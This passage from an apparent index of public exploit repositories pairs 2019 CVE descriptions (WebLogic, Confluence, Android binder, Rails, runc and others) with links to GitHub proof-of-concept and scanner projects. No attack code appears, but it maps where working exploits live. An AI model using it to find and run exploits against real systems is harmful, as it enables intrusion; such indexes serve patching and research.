- [k8gege/CiscoExploit](https://github.com/k8gege/CiscoExploit)
### CVE-2019-1881 (2019-06-05)
A vulnerability in the web-based management interface of Cisco Industrial Network Director (IND) could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device. The vulnerability is due to insufficient CSRF protections for the web-based management interface of the affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to use a web browser and the privileges of the user to perform arbitrary actions on an affected device. For more information about CSRF attacks and potential mitigations, see Understanding Cross-Site Request Forgery Threat Vectors.
- [Shadawks/Strapi-CVE-2019-1881](https://github.com/Shadawks/Strapi-CVE-2019-1881)
### CVE-2019-2107 (2019-07-08)
In ihevcd_parse_pps of ihevcd_parse_headers.c, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-130024844.
- [CrackerCat/CVE-2019-2107](https://github.com/CrackerCat/CVE-2019-2107)
- [infiniteLoopers/CVE-2019-2107](https://github.com/infiniteLoopers/CVE-2019-2107)
### CVE-2019-2196 (2019-11-13)
In Download Provider, there is possible SQL injection. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-135269143
- [IOActive/AOSP-DownloadProviderDbDumperSQLiLimit](https://github.com/IOActive/AOSP-DownloadProviderDbDumperSQLiLimit)
### CVE-2019-2198 (2019-11-13)
In Download Provider, there is a possible SQL injection vulnerability. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-135270103
- [IOActive/AOSP-DownloadProviderDbDumperSQLiWhere](https://github.com/IOActive/AOSP-DownloadProviderDbDumperSQLiWhere)
### CVE-2019-2205 (2019-11-13)
In ProxyResolverV8::SetPacScript of proxy_resolver_v8.cc, there is a possible memory corruption due to a use after free. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.0 Android-8.1 Android-9 Android-10Android ID: A-139806216
- [aemmitt-ns/pacpoc](https://github.com/aemmitt-ns/pacpoc)
### CVE-2019-2215 (2019-10-11)
A use-after-free in binder.c allows an elevation of privilege from an application to the Linux Kernel. No user interaction is required to exploit this vulnerability, however exploitation does require either the installation of a malicious local application or a separate vulnerability in a network facing application.Product: AndroidAndroid ID: A-141720095
- [timwr/CVE-2019-2215](https://github.com/timwr/CVE-2019-2215)
- [raystyle/CVE-2019-2215](https://github.com/raystyle/CVE-2019-2215)
- [kangtastic/cve-2019-2215](https://github.com/kangtastic/cve-2019-2215)
- [ATorNinja/CVE-2019-2215](https://github.com/ATorNinja/CVE-2019-2215)
- [LIznzn/CVE-2019-2215](https://github.com/LIznzn/CVE-2019-2215)
- [DimitriFourny/cve-2019-2215](https://github.com/DimitriFourny/cve-2019-2215)
- [qre0ct/android-kernel-exploitation-ashfaq-CVE-2019-2215](https://github.com/qre0ct/android-kernel-exploitation-ashfaq-CVE-2019-2215)
- [sharif-dev/AndroidKernelVulnerability](https://github.com/sharif-dev/AndroidKernelVulnerability)
- [c3r34lk1ll3r/CVE-2019-2215](https://github.com/c3r34lk1ll3r/CVE-2019-2215)
- [Byte-Master-101/CVE-2019-2215](https://github.com/Byte-Master-101/CVE-2019-2215)
- [mufidmb38/CVE-2019-2215](https://github.com/mufidmb38/CVE-2019-2215)
- [CrackerCat/Rootsmart-v2.0](https://github.com/CrackerCat/Rootsmart-v2.0)
- [enceka/cve-2019-2215-3.18](https://github.com/enceka/cve-2019-2215-3.18)
- [elbiazo/CVE-2019-2215](https://github.com/elbiazo/CVE-2019-2215)
- [stevejubx/CVE-2019-2215](https://github.com/stevejubx/CVE-2019-2215)
- [willboka/CVE-2019-2215-HuaweiP20Lite](https://github.com/willboka/CVE-2019-2215-HuaweiP20Lite)
- [mutur4/CVE-2019-2215](https://github.com/mutur4/CVE-2019-2215)
- [R0rt1z2/huawei-unlock](https://github.com/R0rt1z2/huawei-unlock)
- [raymontag/CVE-2019-2215](https://github.com/raymontag/CVE-2019-2215)
### CVE-2019-2525 (2019-01-16)
Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). Supported versions that are affected are prior to 5.2.24 and prior to 6.0.2. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.0 Base Score 5.6 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N).
- [Phantomn/VirtualBox_CVE-2019-2525-CVE-2019-2548](https://github.com/Phantomn/VirtualBox_CVE-2019-2525-CVE-2019-2548)
- [wotmd/VirtualBox-6.0.0-Exploit-1-day](https://github.com/wotmd/VirtualBox-6.0.0-Exploit-1-day)
### CVE-2019-2615 (2019-04-23)
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N).
- [chiaifan/CVE-2019-2615](https://github.com/chiaifan/CVE-2019-2615)
### CVE-2019-2618 (2019-04-23)
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 5.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N).
- [pyn3rd/CVE-2019-2618](https://github.com/pyn3rd/CVE-2019-2618)
- [jas502n/cve-2019-2618](https://github.com/jas502n/cve-2019-2618)
- [wsfengfan/CVE-2019-2618-](https://github.com/wsfengfan/CVE-2019-2618-)
- [dr0op/WeblogicScan](https://github.com/dr0op/WeblogicScan)
- [he1dan/cve-2019-2618](https://github.com/he1dan/cve-2019-2618)
- [ianxtianxt/cve-2019-2618](https://github.com/ianxtianxt/cve-2019-2618)
- [0xn0ne/weblogicScanner](https://github.com/0xn0ne/weblogicScanner)
### CVE-2019-2725 (2019-04-26)
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [shack2/javaserializetools](https://github.com/shack2/javaserializetools)
- [SkyBlueEternal/CNVD-C-2019-48814-CNNVD-201904-961](https://github.com/SkyBlueEternal/CNVD-C-2019-48814-CNNVD-201904-961)
- [tobechenghuai/CNTA-2019-0014xCVE-2019-2725](https://github.com/tobechenghuai/CNTA-2019-0014xCVE-2019-2725)
- [lasensio/cve-2019-2725](https://github.com/lasensio/cve-2019-2725)
- [davidmthomsen/CVE-2019-2725](https://github.com/davidmthomsen/CVE-2019-2725)
- [leerina/CVE-2019-2725](https://github.com/leerina/CVE-2019-2725)
- [zhusx110/cve-2019-2725](https://github.com/zhusx110/cve-2019-2725)
- [lufeirider/CVE-2019-2725](https://github.com/lufeirider/CVE-2019-2725)
- [TopScrew/CVE-2019-2725](https://github.com/TopScrew/CVE-2019-2725)
- [welove88888/CVE-2019-2725](https://github.com/welove88888/CVE-2019-2725)
- [jiansiting/CVE-2019-2725](https://github.com/jiansiting/CVE-2019-2725)
- [kerlingcode/CVE-2019-2725](https://github.com/kerlingcode/CVE-2019-2725)
- [black-mirror/Weblogic](https://github.com/black-mirror/Weblogic)
- [pimps/CVE-2019-2725](https://github.com/pimps/CVE-2019-2725)
- [ianxtianxt/CVE-2019-2725](https://github.com/ianxtianxt/CVE-2019-2725)
- [N0b1e6/CVE-2019-2725-POC](https://github.com/N0b1e6/CVE-2019-2725-POC)
- [GGyao/weblogic_2019_2725_wls_batch](https://github.com/GGyao/weblogic_2019_2725_wls_batch)
- [ludy-dev/Oracle-WLS-Weblogic-RCE](https://github.com/ludy-dev/Oracle-WLS-Weblogic-RCE)
- [1stPeak/CVE-2019-2725-environment](https://github.com/1stPeak/CVE-2019-2725-environment)
- [CalegariMindSec/Exploit-CVE-2019-2725](https://github.com/CalegariMindSec/Exploit-CVE-2019-2725)
### CVE-2019-2729 (2019-06-19)
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
- [waffl3ss/CVE-2019-2729](https://github.com/waffl3ss/CVE-2019-2729)
- [ruthlezs/CVE-2019-2729-Exploit](https://github.com/ruthlezs/CVE-2019-2729-Exploit)
- [pizza-power/weblogic-CVE-2019-2729-POC](https://github.com/pizza-power/weblogic-CVE-2019-2729-POC)
- [Luchoane/CVE-2019-2729_creal](https://github.com/Luchoane/CVE-2019-2729_creal)
### CVE-2019-2888 (2019-10-16)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: EJB Container). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).
- [jas502n/CVE-2019-2888](https://github.com/jas502n/CVE-2019-2888)
### CVE-2019-2890 (2019-10-16)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Services). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows high privileged attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).
- [ZO1RO/CVE-2019-2890](https://github.com/ZO1RO/CVE-2019-2890)
- [Ky0-HVA/CVE-2019-2890](https://github.com/Ky0-HVA/CVE-2019-2890)
- [freeide/weblogic_cve-2019-2890](https://github.com/freeide/weblogic_cve-2019-2890)
- [l1nk3rlin/CVE-2019-2890](https://github.com/l1nk3rlin/CVE-2019-2890)
- [jas502n/CVE-2019-2890](https://github.com/jas502n/CVE-2019-2890)
- [ianxtianxt/CVE-2019-2890](https://github.com/ianxtianxt/CVE-2019-2890)
- [zhzhdoai/Weblogic_Vuln](https://github.com/zhzhdoai/Weblogic_Vuln)
### CVE-2019-3010 (2019-10-16)
Vulnerability in the Oracle Solaris product of Oracle Systems (component: XScreenSaver). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Solaris. CVSS 3.0 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).
- [chaizeg/privilege-escalation-breach](https://github.com/chaizeg/privilege-escalation-breach)
### CVE-2019-3394 (2019-08-29)
There was a local file disclosure vulnerability in Confluence Server and Confluence Data Center via page exporting. An attacker with permission to editing a page is able to exploit this issue to read arbitrary file on the server under <install-directory>/confluence/WEB-INF directory, which may contain configuration files used for integrating with other services, which could potentially leak credentials or other sensitive information such as LDAP credentials. The LDAP credential will be potentially leaked only if the Confluence server is configured to use LDAP as user repository. All versions of Confluence Server from 6.1.0 before 6.6.16 (the fixed version for 6.6.x), from 6.7.0 before 6.13.7 (the fixed version for 6.13.x), and from 6.14.0 before 6.15.8 (the fixed version for 6.15.x) are affected by this vulnerability.
- [jas502n/CVE-2019-3394](https://github.com/jas502n/CVE-2019-3394)
### CVE-2019-3396 (2019-03-25)
The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
- [dothanthitiendiettiende/CVE-2019-3396](https://github.com/dothanthitiendiettiende/CVE-2019-3396)
- [x-f1v3/CVE-2019-3396](https://github.com/x-f1v3/CVE-2019-3396)
- [xiaoshuier/CVE-2019-3396](https://github.com/xiaoshuier/CVE-2019-3396)
- [Yt1g3r/CVE-2019-3396_EXP](https://github.com/Yt1g3r/CVE-2019-3396_EXP)
- [jas502n/CVE-2019-3396](https://github.com/jas502n/CVE-2019-3396)
- [pyn3rd/CVE-2019-3396](https://github.com/pyn3rd/CVE-2019-3396)
- [s1xg0d/CVE-2019-3396](https://github.com/s1xg0d/CVE-2019-3396)
- [quanpt103/CVE-2019-3396](https://github.com/quanpt103/CVE-2019-3396)
- [vntest11/confluence_CVE-2019-3396](https://github.com/vntest11/confluence_CVE-2019-3396)
- [tanw923/test1](https://github.com/tanw923/test1)
- [skommando/CVE-2019-3396-confluence-poc](https://github.com/skommando/CVE-2019-3396-confluence-poc)
- [JonathanZhou348/CVE-2019-3396TEST](https://github.com/JonathanZhou348/CVE-2019-3396TEST)
- [am6539/CVE-2019-3396](https://github.com/am6539/CVE-2019-3396)
- [W2Ning/CVE-2019-3396](https://github.com/W2Ning/CVE-2019-3396)
- [yuehanked/cve-2019-3396](https://github.com/yuehanked/cve-2019-3396)
- [0xNinjaCyclone/cve-2019-3396](https://github.com/0xNinjaCyclone/cve-2019-3396)
- [46o60/CVE-2019-3396_Confluence](https://github.com/46o60/CVE-2019-3396_Confluence)
- [PetrusViet/cve-2019-3396](https://github.com/PetrusViet/cve-2019-3396)
- [Avento/CVE-2019-3396-Memshell-for-Behinder](https://github.com/Avento/CVE-2019-3396-Memshell-for-Behinder)
### CVE-2019-3398 (2019-04-18)
Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs or to create a new space or a personal space or who has 'Admin' permissions for a space can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center. All versions of Confluence Server from 2.0.0 before 6.6.13 (the fixed version for 6.6.x), from 6.7.0 before 6.12.4 (the fixed version for 6.12.x), from 6.13.0 before 6.13.4 (the fixed version for 6.13.x), from 6.14.0 before 6.14.3 (the fixed version for 6.14.x), and from 6.15.0 before 6.15.2 are affected by this vulnerability.
- [superevr/cve-2019-3398](https://github.com/superevr/cve-2019-3398)
- [132231g/CVE-2019-3398](https://github.com/132231g/CVE-2019-3398)
### CVE-2019-3403 (2019-05-22)
The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames via an incorrect authorisation check.
- [und3sc0n0c1d0/UserEnumJira](https://github.com/und3sc0n0c1d0/UserEnumJira)
- [davidmckennirey/CVE-2019-3403](https://github.com/davidmckennirey/CVE-2019-3403)
### CVE-2019-3462 (2019-01-28)
Incorrect sanitation of the 302 redirect field in HTTP transport method of apt versions 1.4.8 and earlier can lead to content injection by a MITM attacker, potentially leading to remote code execution on the target machine.
- [tonejito/check_CVE-2019-3462](https://github.com/tonejito/check_CVE-2019-3462)
- [atilacastro/update-apt-package](https://github.com/atilacastro/update-apt-package)
### CVE-2019-3663 (2019-11-13)
Unprotected Storage of Credentials vulnerability in McAfee Advanced Threat Defense (ATD) prior to 4.8 allows local attacker to gain access to the root password via accessing sensitive files on the system. This was originally published with a CVSS rating of High, further investigation has resulted in this being updated to Critical. The root password is common across all instances of ATD prior to 4.8. See the Security bulletin for further details
- [funoverip/mcafee_atd_CVE-2019-3663](https://github.com/funoverip/mcafee_atd_CVE-2019-3663)
### CVE-2019-3719 (2019-04-18)
Dell SupportAssist Client versions prior to 3.2.0.90 contain a remote code execution vulnerability. An unauthenticated attacker, sharing the network access layer with the vulnerable system, can compromise the vulnerable system by tricking a victim user into downloading and executing arbitrary executables via SupportAssist client from attacker hosted sites.
- [jiansiting/CVE-2019-3719](https://github.com/jiansiting/CVE-2019-3719)
### CVE-2019-3778 (2019-03-07)
Spring Security OAuth, versions 2.3 prior to 2.3.5, and 2.2 prior to 2.2.4, and 2.1 prior to 2.1.4, and 2.0 prior to 2.0.17, and older unsupported versions could be susceptible to an open redirector attack that can leak an authorization code. A malicious user or attacker can craft a request to the authorization endpoint using the authorization code grant type, and specify a manipulated redirection URI via the "redirect_uri" parameter. This can cause the authorization server to redirect the resource owner user-agent to a URI under the control of the attacker with the leaked authorization code. This vulnerability exposes applications that meet all of the following requirements: Act in the role of an Authorization Server (e.g. @EnableAuthorizationServer) and uses the DefaultRedirectResolver in the AuthorizationEndpoint. This vulnerability does not expose applications that: Act in the role of an Authorization Server and uses a different RedirectResolver implementation other than DefaultRedirectResolver, act in the role of a Resource Server only (e.g. @EnableResourceServer), act in the role of a Client only (e.g. @EnableOAuthClient).
- [BBB-man/CVE-2019-3778-Spring-Security-OAuth-2.3-Open-Redirection](https://github.com/BBB-man/CVE-2019-3778-Spring-Security-OAuth-2.3-Open-Redirection)
### CVE-2019-3799 (2019-05-06)
Spring Cloud Config, versions 2.1.x prior to 2.1.2, versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead a directory traversal attack.
- [mpgn/CVE-2019-3799](https://github.com/mpgn/CVE-2019-3799)
- [Corgizz/SpringCloud](https://github.com/Corgizz/SpringCloud)
### CVE-2019-3810 (2019-03-25)
A flaw was found in moodle versions 3.6 to 3.6.1, 3.5 to 3.5.3, 3.4 to 3.4.6, 3.1 to 3.1.15 and earlier unsupported versions. The /userpix/ page did not escape users' full names, which are included as text when hovering over profile images. Note this page is not linked to by default and its access is restricted.
- [farisv/Moodle-CVE-2019-3810](https://github.com/farisv/Moodle-CVE-2019-3810)
### CVE-2019-3847 (2019-03-27)
A vulnerability was found in moodle before versions 3.6.3, 3.5.5, 3.4.8 and 3.1.17. Users with the "login as other users" capability (such as administrators/managers) can access other users' Dashboards, but the JavaScript those other users may have added to their Dashboard was not being escaped when being viewed by the user logging in on their behalf.
- [danielthatcher/moodle-login-csrf](https://github.com/danielthatcher/moodle-login-csrf)
### CVE-2019-3929 (2019-04-30)
The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.
- [xfox64x/CVE-2019-3929](https://github.com/xfox64x/CVE-2019-3929)
### CVE-2019-3980 (2019-10-08)
The Solarwinds Dameware Mini Remote Client agent v12.1.0.89 supports smart card authentication which can allow a user to upload an executable to be executed on the DWRCS.exe host. An unauthenticated, remote attacker can request smart card login and upload and execute an arbitrary executable run under the Local System account.
- [warferik/CVE-2019-3980](https://github.com/warferik/CVE-2019-3980)
- [Barbarisch/CVE-2019-3980](https://github.com/Barbarisch/CVE-2019-3980)
### CVE-2019-4650 (2020-06-26)
IBM Maximo Asset Management 7.6.1.1 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 170961.
- [aneeshanilkumar89/Maximo_Sql_Injection-CVE-2019-4650](https://github.com/aneeshanilkumar89/Maximo_Sql_Injection-CVE-2019-4650)
### CVE-2019-5010 (2019-10-31)
An exploitable denial-of-service vulnerability exists in the X509 certificate parser of Python.org Python 2.7.11 / 3.6.6. A specially crafted X509 certificate can cause a NULL pointer dereference, resulting in a denial of service. An attacker can initiate or accept TLS connections using crafted certificates to trigger this vulnerability.
- [JonathanWilbur/CVE-2019-5010](https://github.com/JonathanWilbur/CVE-2019-5010)
### CVE-2019-5029 (2019-11-13)
An exploitable command injection vulnerability exists in the Config editor of the Exhibitor Web UI versions 1.0.9 to 1.7.1. Arbitrary shell commands surrounded by backticks or $() can be inserted into the editor and will be executed by the Exhibitor process when it launches ZooKeeper. An attacker can execute any command as the user running the Exhibitor process.
- [thehunt1s0n/Exihibitor-RCE](https://github.com/thehunt1s0n/Exihibitor-RCE)
### CVE-2019-5096 (2019-12-03)
An exploitable code execution vulnerability exists in the processing of multi-part/form-data requests within the base GoAhead web server application in versions v5.0.1, v.4.1.1 and v3.6.5. A specially crafted HTTP request can lead to a use-after-free condition during the processing of this request that can be used to corrupt heap structures that could lead to full code execution. The request can be unauthenticated in the form of GET or POST requests, and does not require the requested resource to exist on the server.
- [ianxtianxt/CVE-2019-5096-GoAhead-Web-Server-Dos-Exploit](https://github.com/ianxtianxt/CVE-2019-5096-GoAhead-Web-Server-Dos-Exploit)
### CVE-2019-5413 (2019-03-17)
An attacker can use the format parameter to inject arbitrary commands in the npm package morgan < 1.9.1.
- [forse01/CVE-2019-5413-NetBeans](https://github.com/forse01/CVE-2019-5413-NetBeans)
- [forse01/CVE-2019-5413-NetBeans-NoJson](https://github.com/forse01/CVE-2019-5413-NetBeans-NoJson)
### CVE-2019-5418 (2019-03-27)
There is a File Content Disclosure vulnerability in Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 where specially crafted accept headers can cause contents of arbitrary files on the target system's filesystem to be exposed.
- [mpgn/CVE-2019-5418](https://github.com/mpgn/CVE-2019-5418)
- [omarkurt/CVE-2019-5418](https://github.com/omarkurt/CVE-2019-5418)
- [brompwnie/CVE-2019-5418-Scanner](https://github.com/brompwnie/CVE-2019-5418-Scanner)
- [mpgn/Rails-doubletap-RCE](https://github.com/mpgn/Rails-doubletap-RCE)
- [takeokunn/CVE-2019-5418](https://github.com/takeokunn/CVE-2019-5418)
- [Bad3r/RailroadBandit](https://github.com/Bad3r/RailroadBandit)
- [ztgrace/CVE-2019-5418-Rails3](https://github.com/ztgrace/CVE-2019-5418-Rails3)
- [random-robbie/CVE-2019-5418](https://github.com/random-robbie/CVE-2019-5418)
- [kailing0220/CVE-2019-5418](https://github.com/kailing0220/CVE-2019-5418)
### CVE-2019-5420 (2019-03-27)
A remote code execution vulnerability in development mode Rails <5.2.2.1, <6.0.0.beta3 can allow an attacker to guess the automatically generated development mode secret token. This secret token can be used in combination with other Rails internals to escalate to a remote code execution exploit.
- [knqyf263/CVE-2019-5420](https://github.com/knqyf263/CVE-2019-5420)
- [cved-sources/cve-2019-5420](https://github.com/cved-sources/cve-2019-5420)
- [AnasTaoutaou/CVE-2019-5420](https://github.com/AnasTaoutaou/CVE-2019-5420)
- [Eremiel/CVE-2019-5420](https://github.com/Eremiel/CVE-2019-5420)
- [scumdestroy/CVE-2019-5420.rb](https://github.com/scumdestroy/CVE-2019-5420.rb)
- [j4k0m/CVE-2019-5420](https://github.com/j4k0m/CVE-2019-5420)
- [mmeza-developer/CVE-2019-5420-RCE](https://github.com/mmeza-developer/CVE-2019-5420-RCE)
- [trickstersec/CVE-2019-5420](https://github.com/trickstersec/CVE-2019-5420)
- [PenTestical/CVE-2019-5420](https://github.com/PenTestical/CVE-2019-5420)
- [laffray/ruby-RCE-CVE-2019-5420-](https://github.com/laffray/ruby-RCE-CVE-2019-5420-)
### CVE-2019-5427 (2019-04-22)
c3p0 version < 0.9.5.4 may be exploited by a billion laughs attack when loading XML configuration due to missing protections against recursive entity expansion when loading configuration.
- [shanika04/cp30_XXE_partial_fix](https://github.com/shanika04/cp30_XXE_partial_fix)
### CVE-2019-5454 (2019-07-30)
SQL Injection in the Nextcloud Android app prior to version 3.0.0 allows to destroy a local cache when a harmful query is executed requiring to resetup the account.
- [shanika04/nextcloud_android](https://github.com/shanika04/nextcloud_android)
### CVE-2019-5475 (2019-09-03)
The Nexus Yum Repository Plugin in v2 is vulnerable to Remote Code Execution when instances using CommandLineExecutor.java are supplied vulnerable data, such as the Yum Configuration Capability.
- [jaychouzzk/CVE-2019-5475-Nexus-Repository-Manager-](https://github.com/jaychouzzk/CVE-2019-5475-Nexus-Repository-Manager-)
- [rabbitmask/CVE-2019-5475-EXP](https://github.com/rabbitmask/CVE-2019-5475-EXP)
- [EXP-Docs/CVE-2019-5475](https://github.com/EXP-Docs/CVE-2019-5475)
### CVE-2019-5489 (2019-01-07)
The mincore() implementation in mm/mincore.c in the Linux kernel through 4.19.13 allowed local attackers to observe page cache access patterns of other processes on the same system, potentially allowing sniffing of secret information. (Fixing this affects the output of the fincore program.) Limited remote exploitation may be possible, as demonstrated by latency differences in accessing public files from an Apache HTTP Server.
- [mmxsrup/CVE-2019-5489](https://github.com/mmxsrup/CVE-2019-5489)
### CVE-2019-5544 (2019-12-06)
OpenSLP as used in ESXi and the Horizon DaaS appliances has a heap overwrite issue. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.
- [HynekPetrak/CVE-2019-5544_CVE-2020-3992](https://github.com/HynekPetrak/CVE-2019-5544_CVE-2020-3992)
- [dgh05t/VMware_ESXI_OpenSLP_PoCs](https://github.com/dgh05t/VMware_ESXI_OpenSLP_PoCs)
- [vpxuser/VMware-ESXI-OpenSLP-Exploit](https://github.com/vpxuser/VMware-ESXI-OpenSLP-Exploit)
### CVE-2019-5596 (2019-02-12)
In FreeBSD 11.2-STABLE after r338618 and before r343786, 12.0-STABLE before r343781, and 12.0-RELEASE before 12.0-RELEASE-p3, a bug in the reference count implementation for UNIX domain sockets can cause a file structure to be incorrectly released potentially allowing a malicious local user to gain root privileges or escape from a jail.
- [raymontag/CVE-2019-5596](https://github.com/raymontag/CVE-2019-5596)
### CVE-2019-5603 (2019-07-26)
In FreeBSD 12.0-STABLE before r350261, 12.0-RELEASE before 12.0-RELEASE-p8, 11.3-STABLE before r350263, 11.3-RELEASE before 11.3-RELEASE-p1, and 11.2-RELEASE before 11.2-RELEASE-p12, system calls operating on file descriptors as part of mqueuefs did not properly release the reference allowing a malicious user to overflow the counter allowing access to files, directories, and sockets opened by processes owned by other users.
- [raymontag/CVE-2019-5603](https://github.com/raymontag/CVE-2019-5603)
### CVE-2019-5624 (2019-04-30)
Rapid7 Metasploit Framework suffers from an instance of CWE-22, Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in the Zip import function of Metasploit. Exploiting this vulnerability can allow an attacker to execute arbitrary code in Metasploit at the privilege level of the user running Metasploit. This issue affects: Rapid7 Metasploit Framework version 4.14.0 and prior versions.
- [VoidSec/CVE-2019-5624](https://github.com/VoidSec/CVE-2019-5624)
### CVE-2019-5630 (2019-07-03)
A Cross-Site Request Forgery (CSRF) vulnerability was found in Rapid7 Nexpose InsightVM Security Console versions 6.5.0 through 6.5.68. This issue allows attackers to exploit CSRF vulnerabilities on API endpoints using Flash to circumvent a cross-domain pre-flight OPTIONS request.
- [rbeede/CVE-2019-5630](https://github.com/rbeede/CVE-2019-5630)
### CVE-2019-5700 (2019-10-09)
NVIDIA Shield TV Experience prior to v8.0.1, NVIDIA Tegra software contains a vulnerability in the bootloader, where it does not validate the fields of the boot image, which may lead to code execution, denial of service, escalation of privileges, and information disclosure.
- [oscardagrach/CVE-2019-5700](https://github.com/oscardagrach/CVE-2019-5700)
### CVE-2019-5736 (2019-02-11)
runc through 1.0-rc6, as used in Docker before 18.09.2 and other products, allows attackers to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an existing container, to which the attacker previously had write access, that can be attached with docker exec. This occurs because of file-descriptor mishandling, related to /proc/self/exe.
